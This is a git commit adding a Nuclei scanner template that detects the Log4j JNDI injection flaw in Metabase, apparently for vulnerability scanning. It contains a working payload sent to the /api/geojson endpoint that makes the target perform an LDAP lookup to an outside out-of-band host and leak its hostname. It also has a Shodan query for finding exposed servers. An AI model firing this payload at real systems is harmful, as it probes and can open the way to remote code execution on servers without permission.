Create metabase-log4j.yaml

2022-07-23 18:13:33 +05:30 · 2022-07-23 18:13:33 +05:30 · 90350b90cc
parent b59f5b01ea
commit 90350b90cc
1 changed files with 41 additions and 0 deletions
--- a/vulnerabilities/other/metabase-log4j.yaml
+++ b/vulnerabilities/other/metabase-log4j.yaml
@ -0,0 +1,41 @@
+id: metabase-log4j
+
+info:
+  name: Metabase Log4j
+  author: DhiyaneshDK
+  severity: critical
+  description: The vulnerability exists due to incomplete patch in Apache Log4j 2.15.0 for a code injection vulnerability #VU58816 (CVE-2021-44228) in certain non-default configurations. A remote attacker with control over Thread Context Map (MDC) input data when the logging configuration uses a non-default Pattern Layout with either a Context Lookup (for example, $${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc, or %MDC) can pass malicious data using a JNDI Lookup pattern and perform a denial of service (DoS) attack, exfiltrate data or execute arbitrary code.
+  reference:
+    - https://www.cybersecurity-help.cz/vdb/SB2021121706
+  metadata:
+    verified: true
+    shodan-query: title:"Metabase"
+  tags: rce,jndi,log4j,metabase
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/api/geojson?url=${jndi:ldap://${hostName}.{{interactsh-url}}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol  # Confirms the DNS Interaction
+        words:
+          - "dns"
+
+      - type: regex
+        part: interactsh_request
+        regex:
+          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'  # Match for extracted ${hostName} variable
+
+    extractors:
+      - type: kval
+        kval:
+          - interactsh_ip # Print remote interaction IP in output
+
+      - type: regex
+        part: interactsh_request
+        group: 1
+        regex:
+          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'